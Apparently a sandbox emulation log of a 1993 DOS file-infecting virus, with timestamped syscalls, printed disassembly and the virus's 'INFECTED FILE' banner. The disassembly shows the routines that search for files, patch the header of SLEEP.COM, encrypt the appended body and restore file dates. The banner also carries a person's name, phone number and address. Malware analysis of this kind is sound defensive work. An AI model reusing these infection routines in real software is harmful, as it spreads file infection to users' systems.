2018-12-25T11:52:55.772803643Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.775250096Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.776361314Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.780053549Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.782275454Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.789946779Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.791734343Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.799122832Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.801654297Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.808402987Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.814385851Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.815593785Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.818566457Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.819850276Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.822287756Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.825437463Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.833252828Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.834612626Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.843464909Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.846737857Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.852996886Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.859644713Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.860923111Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.863386769Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.865056594Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.867505833Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.869827407Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.877989947Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.879294056Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.888599753Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.891475499Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.897622443Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.904049849Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.905959727Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.913268939Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.916416484Z 9 PC: 12a47 | Display string (String= '')
2018-12-25T11:52:55.918747649Z 9 PC: 12a4c | Display string (String= '����������������������������������������������������������������������ͻ ')
2018-12-25T11:52:55.923985989Z 9 PC: 12a51 | Display string (String= '� !!! WARNING INFECTED FILE !!! � ')
2018-12-25T11:52:55.929888629Z 9 PC: 12a56 | Display string (String= '� � ')
2018-12-25T11:52:55.935974972Z 9 PC: 12a5b | Display string (String= '� FILE NAME ***************************** FILE SIZE *************** � ')
2018-12-25T11:52:55.941257883Z 9 PC: 12a60 | Display string (String= '� � ')
2018-12-25T11:52:55.946566008Z 9 PC: 12a65 | Display string (String= '� NOTES: � ')
2018-12-25T11:52:55.952355372Z 9 PC: 12a6a | Display string (Could not find end pointer)
2018-12-25T11:52:55.960887945Z 9 PC: 12a6f | Display string (String= '*********************************************** � � ******************************************************************** � ')
2018-12-25T11:52:55.967556294Z 9 PC: 12a74 | Display string (String= '� INFECTED FILES SHOULD BE UPLOADED TO THE METAVERSE BBS (606) 843-9363� � COPYRIGHT (c) 1993 ROBERT BULLOCK, RT 4 BOX 413E KEAVY, KY 40737 � ')
2018-12-25T11:52:55.976089778Z 9 PC: 12a79 | Display string (String= '����������������������������������������������������������������������ͼ ')
2018-12-25T11:52:55.981676462Z 9 PC: 12a7e | Display string (String= '')
2018-12-25T11:52:55.983650042Z 76 PC: 12a83 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4797,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:55.71433228Z 42 PC: 149f3 | Get date 0x149f3: cmp al, 3
0x149f5: jne 0x14a01
0x149f7: mov dx, bp
0x149f9: add dx, 0x1fe
0x149fd: mov ah, 0x3b
0x149ff: int 0x21
0x14a01: mov ah, 0x4e
0x14a03: xor cx, cx
0x14a05: mov dx, bp
0x14a07: add dx, 0x201
0x14a0b: int 0x21
0x14a0d: jb 0x14a31
0x14a0f: mov ax, 0
0x14a12: mov es, ax
0x14a14: cmp word ptr es:[3], -1
0x14a1a: je 0x14a29
0x14a1c: add bp, 0x1aa
0x14a20: mov byte ptr cs:[bp], 0x9a
0x14a25: mov ax, 0xffff
0x14a28: dec word ptr [0xe807]
2018-12-25T11:52:55.717224874Z 78 PC: 14a0d | Find first file
2018-12-25T11:52:55.722910074Z 61 PC: 14a8a | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:55.729312637Z 63 PC: 14a99 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:52:55.73590224Z 66 PC: 14ac3 | Move file pointer
2018-12-25T11:52:55.737653408Z 64 PC: 14ad0 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:52:55.740446851Z 66 PC: 14ad9 | Move file pointer
2018-12-25T11:52:55.742110821Z 64 PC: 14ae6 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:52:55.744876702Z 44 PC: 14afc | Get time 0x14afc: mov ah, dh
0x14afe: add ah, byte ptr [bx]
0x14b00: mov byte ptr [bx], ah
0x14b02: mov dl, byte ptr [0x9a]
0x14b06: add dl, byte ptr [bx + 1]
0x14b09: mov byte ptr [bx + 1], dl
0x14b0c: mov cx, 0x2e
0x14b0f: rep movsb byte ptr es:[di], byte ptr [si]
0x14b11: mov cx, 0x1cd
0x14b14: lodsb al, byte ptr [si]
0x14b15: sub al, ah
0x14b17: sub ah, dl
0x14b19: sub ah, dl
0x14b1b: stosb byte ptr es:[di], al
0x14b1c: loop 0x14b14
0x14b1e: pop bx
0x14b1f: mov dx, bp
0x14b21: add dx, 0x385
0x14b25: mov cx, 0x1fb
0x14b28: mov ah, 0x40
2018-12-25T11:52:55.747248803Z 64 PC: 14b2c | Write file or device (Write 507 bytes on handle 5)
2018-12-25T11:52:55.761772518Z 87 PC: 14b39 | Get or set file date and time
2018-12-25T11:52:55.764691196Z 62 PC: 14b3d | Close file
2018-12-25T11:52:55.773415657Z 79 PC: 14a38 | Find next file
2018-12-25T11:52:55.776843859Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.787629599Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.79496422Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.796774897Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.801014054Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.802936401Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.806239045Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.810251811Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.81911269Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.820779887Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.829897514Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.833727634Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.841309096Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.84933443Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.852901288Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.856230828Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.858239928Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.862704923Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.865705244Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.874830244Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.877813235Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.886441941Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.889566027Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.897827634Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.908050809Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.910117932Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.913843978Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.916778936Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.92033639Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.923471477Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.933676031Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.935383045Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.943603859Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.947103728Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.95490644Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.962138323Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.96457882Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.967820714Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.969724146Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.973435049Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.9760042Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.985437331Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.989264528Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:56.001185035Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:56.004473861Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:56.012174941Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:56.019647557Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:56.02132595Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:56.024878061Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:56.027138954Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:56.030109909Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:56.034331128Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:56.043500192Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:56.045051325Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:56.053810242Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:56.057886514Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:56.069058544Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:56.076679786Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:56.079285144Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:56.082227689Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:56.083947271Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:56.08779868Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:56.091719248Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:56.110909667Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:56.113317102Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:56.122837305Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:56.126053351Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:56.134534944Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:56.138797599Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:56.140555306Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:56.148380898Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:56.152012463Z 9 PC: 12a47 | Display string (String= '')
2018-12-25T11:52:56.15434465Z 9 PC: 12a4c | Display string (String= '����������������������������������������������������������������������ͻ ')
2018-12-25T11:52:56.160830216Z 9 PC: 12a51 | Display string (String= '� !!! WARNING INFECTED FILE !!! � ')
2018-12-25T11:52:56.168476433Z 9 PC: 12a56 | Display string (String= '� � ')
2018-12-25T11:52:56.174617283Z 9 PC: 12a5b | Display string (String= '� FILE NAME ***************************** FILE SIZE *************** � ')
2018-12-25T11:52:56.189989206Z 9 PC: 12a60 | Display string (String= '� � ')
2018-12-25T11:52:56.196697159Z 9 PC: 12a65 | Display string (String= '� NOTES: � ')
2018-12-25T11:52:56.204225286Z 9 PC: 12a6a | Display string (Could not find end pointer)
2018-12-25T11:52:56.214640708Z 9 PC: 12a6f | Display string (String= '*********************************************** � � ******************************************************************** � ')
2018-12-25T11:52:56.222562672Z 9 PC: 12a74 | Display string (String= '� INFECTED FILES SHOULD BE UPLOADED TO THE METAVERSE BBS (606) 843-9363� � COPYRIGHT (c) 1993 ROBERT BULLOCK, RT 4 BOX 413E KEAVY, KY 40737 � ')
2018-12-25T11:52:56.232019135Z 9 PC: 12a79 | Display string (String= '����������������������������������������������������������������������ͼ ')
2018-12-25T11:52:56.250907182Z 9 PC: 12a7e | Display string (String= '')
2018-12-25T11:52:56.254670684Z 76 PC: 12a83 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4797,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:55.692177622Z 42 PC: 149f3 | Get date 0x149f3: cmp al, 3
0x149f5: jne 0x14a01
0x149f7: mov dx, bp
0x149f9: add dx, 0x1fe
0x149fd: mov ah, 0x3b
0x149ff: int 0x21
0x14a01: mov ah, 0x4e
0x14a03: xor cx, cx
0x14a05: mov dx, bp
0x14a07: add dx, 0x201
0x14a0b: int 0x21
0x14a0d: jb 0x14a31
0x14a0f: mov ax, 0
0x14a12: mov es, ax
0x14a14: cmp word ptr es:[3], -1
0x14a1a: je 0x14a29
0x14a1c: add bp, 0x1aa
0x14a20: mov byte ptr cs:[bp], 0x9a
0x14a25: mov ax, 0xffff
0x14a28: dec word ptr [0xe807]
2018-12-25T11:52:55.694915896Z 59 PC: 14a01 | Change current directory
2018-12-25T11:52:55.699426085Z 78 PC: 14a0d | Find first file
2018-12-25T11:52:55.706164942Z 61 PC: 14a8a | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:55.719852136Z 63 PC: 14a99 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:52:55.726997701Z 66 PC: 14ac3 | Move file pointer
2018-12-25T11:52:55.728664213Z 64 PC: 14ad0 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:52:55.730637402Z 66 PC: 14ad9 | Move file pointer
2018-12-25T11:52:55.732072465Z 64 PC: 14ae6 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:52:55.733883137Z 44 PC: 14afc | Get time 0x14afc: mov ah, dh
0x14afe: add ah, byte ptr [bx]
0x14b00: mov byte ptr [bx], ah
0x14b02: mov dl, byte ptr [0x9a]
0x14b06: add dl, byte ptr [bx + 1]
0x14b09: mov byte ptr [bx + 1], dl
0x14b0c: mov cx, 0x2e
0x14b0f: rep movsb byte ptr es:[di], byte ptr [si]
0x14b11: mov cx, 0x1cd
0x14b14: lodsb al, byte ptr [si]
0x14b15: sub al, ah
0x14b17: sub ah, dl
0x14b19: sub ah, dl
0x14b1b: stosb byte ptr es:[di], al
0x14b1c: loop 0x14b14
0x14b1e: pop bx
0x14b1f: mov dx, bp
0x14b21: add dx, 0x385
0x14b25: mov cx, 0x1fb
0x14b28: mov ah, 0x40
2018-12-25T11:52:55.735636292Z 64 PC: 14b2c | Write file or device (Write 507 bytes on handle 5)
2018-12-25T11:52:55.748240192Z 87 PC: 14b39 | Get or set file date and time
2018-12-25T11:52:55.749949593Z 62 PC: 14b3d | Close file
2018-12-25T11:52:55.760522471Z 79 PC: 14a38 | Find next file
2018-12-25T11:52:55.764976067Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.773547273Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.780981276Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.782825559Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.787573852Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.789063917Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.792301235Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.795123564Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.803871925Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.80523131Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.828560971Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.831735632Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.839187286Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.847012731Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.848572258Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.852094804Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.861656982Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.864683092Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.867224768Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.876872843Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.878644303Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.886954457Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.889707093Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.896938736Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.903817809Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.905203584Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.909310622Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.910816646Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.913592045Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.916683296Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.925872827Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.927333367Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.93656914Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.93956979Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.947443128Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.955415216Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.956960241Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.959850225Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.962121873Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.96567823Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.968693181Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.977780841Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.980029339Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.988549447Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.992592775Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:56.000861968Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:56.008091607Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:56.009989279Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:56.013870505Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:56.015299976Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:56.018091741Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:56.021664863Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:56.031499585Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:56.033580922Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:56.043318475Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:56.046973113Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:56.054782431Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:56.063060898Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:56.066094098Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:56.069556741Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:56.07155819Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:56.07539135Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:56.078243475Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:56.087509422Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:56.091379808Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:56.100781475Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:56.103806633Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:56.112420704Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:56.120503429Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:56.122656062Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:56.131568561Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:56.134627148Z 9 PC: 12a47 | Display string (String= '')
2018-12-25T11:52:56.137116385Z 9 PC: 12a4c | Display string (String= '����������������������������������������������������������������������ͻ ')
2018-12-25T11:52:56.143562877Z 9 PC: 12a51 | Display string (String= '� !!! WARNING INFECTED FILE !!! � ')
2018-12-25T11:52:56.151414611Z 9 PC: 12a56 | Display string (String= '� � ')
2018-12-25T11:52:56.158065098Z 9 PC: 12a5b | Display string (String= '� FILE NAME ***************************** FILE SIZE *************** � ')
2018-12-25T11:52:56.164643198Z 9 PC: 12a60 | Display string (String= '� � ')
2018-12-25T11:52:56.172064595Z 9 PC: 12a65 | Display string (String= '� NOTES: � ')
2018-12-25T11:52:56.179142907Z 9 PC: 12a6a | Display string (Could not find end pointer)
2018-12-25T11:52:56.190987167Z 9 PC: 12a6f | Display string (String= '*********************************************** � � ******************************************************************** � ')
2018-12-25T11:52:56.200791794Z 9 PC: 12a74 | Display string (String= '� INFECTED FILES SHOULD BE UPLOADED TO THE METAVERSE BBS (606) 843-9363� � COPYRIGHT (c) 1993 ROBERT BULLOCK, RT 4 BOX 413E KEAVY, KY 40737 � ')
2018-12-25T11:52:56.209177094Z 9 PC: 12a79 | Display string (String= '����������������������������������������������������������������������ͼ ')
2018-12-25T11:52:56.215726Z 9 PC: 12a7e | Display string (String= '')
2018-12-25T11:52:56.21919688Z 76 PC: 12a83 | Terminate with return code (Return code = '0')